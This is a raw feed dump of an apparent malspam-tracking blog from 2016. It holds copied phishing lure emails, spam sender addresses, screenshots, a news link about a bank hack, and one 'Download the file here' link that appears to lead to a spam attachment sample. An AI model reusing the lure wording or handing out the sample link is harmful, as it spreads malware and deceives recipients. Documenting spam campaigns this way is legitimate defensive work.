/></a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-8334793899289552192016-06-27T04:33:00.003-07:002016-06-28T04:14:47.062-07:00Updated document <div class="separator" style="clear: both; text-align: center;">
</div>
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467026854406_2606" style="-webkit-padding-start: 0px; background-color: white; box-sizing: border-box; display: table; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13px; padding-left: 0px; padding-top: 12px; width: 843px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467026854406_2605" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
Dear john,<br />
<br style="-webkit-padding-start: 0px;" />
The reference you requested is attached.<br />
Let me know if you have any questions.<br />
<br style="-webkit-padding-start: 0px;" />
Best regards<br />
<br style="-webkit-padding-start: 0px;" />
Josefa Abbott<br />
Group Managing Director<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-PxSLcFLfYxY/V3EO7XZuWcI/AAAAAAAAAD4/DhluDsNGvzs6RnViLXIkyvccG525NXiyACKgB/s1600/Screen%2BShot%2B2016-06-27%2Bat%2B9.32.54%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://3.bp.blogspot.com/-PxSLcFLfYxY/V3EO7XZuWcI/AAAAAAAAAD4/DhluDsNGvzs6RnViLXIkyvccG525NXiyACKgB/s320/Screen%2BShot%2B2016-06-27%2Bat%2B9.32.54%2Bpm.png" width="320" /></a></div>
<br />
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-73253327774337225102016-06-27T04:33:00.001-07:002016-06-27T04:33:54.946-07:00Updated document <div class="separator" style="clear: both; text-align: center;">
</div>
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467026854406_2606" style="-webkit-padding-start: 0px; background-color: white; box-sizing: border-box; display: table; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13px; padding-left: 0px; padding-top: 12px; width: 843px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467026854406_2605" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
Dear john,<br />
<br style="-webkit-padding-start: 0px;" />
The reference you requested is attached.<br />
Let me know if you have any questions.<br />
<br style="-webkit-padding-start: 0px;" />
Best regards<br />
<br style="-webkit-padding-start: 0px;" />
Josefa Abbott<br />
Group Managing Director<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-PxSLcFLfYxY/V3EO7XZuWcI/AAAAAAAAAD4/DhluDsNGvzs6RnViLXIkyvccG525NXiyACKgB/s1600/Screen%2BShot%2B2016-06-27%2Bat%2B9.32.54%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://3.bp.blogspot.com/-PxSLcFLfYxY/V3EO7XZuWcI/AAAAAAAAAD4/DhluDsNGvzs6RnViLXIkyvccG525NXiyACKgB/s320/Screen%2BShot%2B2016-06-27%2Bat%2B9.32.54%2Bpm.png" width="320" /></a></div>
<br />
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-82793202401040978352016-04-28T04:38:00.001-07:002016-04-28T04:38:18.317-07:00MalSpam: Price list<span style="font-family: Arial, Helvetica, sans-serif;">Sender: RogersJeff13451@jazztel.es</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-0Y1dLyKaiIk/VyH1UNZxQPI/AAAAAAAAACE/CpduLaCtKmsM4H3-WG9W1tuEv1_6Vl6kQCLcB/s1600/bill.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://3.bp.blogspot.com/-0Y1dLyKaiIk/VyH1UNZxQPI/AAAAAAAAACE/CpduLaCtKmsM4H3-WG9W1tuEv1_6Vl6kQCLcB/s1600/bill.png" /></span></a><a href="https://3.bp.blogspot.com/-0Y1dLyKaiIk/VyH1UNZxQPI/AAAAAAAAACE/CpduLaCtKmsM4H3-WG9W1tuEv1_6Vl6kQCLcB/s1600/bill.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></a></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Download the file <a href="https://drive.google.com/file/d/0B131CgkpMDDKOHU2QWVuek1PMkE/view?usp=sharing">here</a>. </span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-74225186383550873472016-04-26T03:01:00.000-07:002016-04-26T03:01:49.004-07:00NEWS: An $80M Bank Hack Has Been Blamed on $10 Routers<span style="background-color: white; color: #222222; font-family: ElizabethSerif, Georgia, serif; font-size: 16px; line-height: 29px;">Sometimes it pays to spend. The central bank of Bangladesh has found that out the hard way, as police are blaming its loss of $80m during a hack on crappy $10 routers.</span><br />
<span style="background-color: white; color: #222222; font-family: ElizabethSerif, Georgia, serif; font-size: 16px; line-height: 29px;"><a href="http://gizmodo.com/an-80m-bank-hack-has-been-blamed-on-10-routers-1772442595">Read the full story here</a>. </span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-90305180364710979972016-04-21T05:11:00.001-07:002016-04-21T05:11:18.645-07:00MalSpam: FW: Receipt #119798<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Sender: FarleyClare9749@greenvillehomebuyer.com</span><div>
<span style="font-family: Arial, Helvetica, sans-serif;">Subject: <span style="background-color: white; line-height: 35px; white-space: nowrap;">FW: Receipt #119798</span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; line-height: 35px; white-space: nowrap;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-isVmHTzXk_I/VxjDT7vJ24I/AAAAAAAAAB0/Bkp1osBwfqMcMAf92jtedgwr1jVNvvjPwCLcB/s1600/Screen%2BShot%2B2016-04-21%2Bat%2B10.09.34%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="165" src="https://2.bp.blogspot.com/-isVmHTzXk_I/VxjDT7vJ24I/AAAAAAAAAB0/Bkp1osBwfqMcMAf92jtedgwr1jVNvvjPwCLcB/s400/Screen%2BShot%2B2016-04-21%2Bat%2B10.09.34%2Bpm.png" width="400" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; line-height: 35px; white-space: nowrap;"><br /></span></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-7173848264748722422016-04-21T04:38:00.002-07:002016-04-21T04:47:54.886-07:00MalSpam: FW:<span style="font-family: "arial" , "helvetica" , sans-serif;">Sender: willsonSuzanne420@thriftevaluator.com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-m4SbAKujSQ4/Vxi7RCz7FaI/AAAAAAAAABk/Glf4PW-Dzs8R299IohEjIDk-byve0e56QCLcB/s1600/Screen%2BShot%2B2016-04-21%2Bat%2B9.35.54%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img border="0" height="118" src="https://2.bp.blogspot.com/-m4SbAKujSQ4/Vxi7RCz7FaI/AAAAAAAAABk/Glf4PW-Dzs8R299IohEjIDk-byve0e56QCLcB/s400/Screen%2BShot%2B2016-04-21%2Bat%2B9.35.54%2Bpm.png" width="400" /></span></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>Unknownnoreply@blogger.com0